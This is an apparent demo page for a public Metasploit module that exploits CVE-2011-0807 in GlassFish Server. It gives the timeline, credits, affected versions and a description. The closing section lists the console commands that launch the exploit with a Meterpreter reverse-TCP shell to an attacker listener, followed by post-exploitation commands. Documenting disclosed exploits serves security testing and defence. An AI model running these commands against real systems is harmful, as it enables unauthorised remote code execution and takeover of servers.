CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2010-09-23
Coordinated public release of the vulnerability the 2011-04-19
Metasploit PoC provided the 2011-08-04

PoC provided by :

juan vazquez
Joshua Abraham
sinn3r

Reference(s) :

CVE-2011-0807
ZDI-11-137

Affected version(s) :

Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1

Tested on Windows XP SP3 with :

Sun GlassFish Enterprise Server 3.0.1

Description :

This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.

Commands :

use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig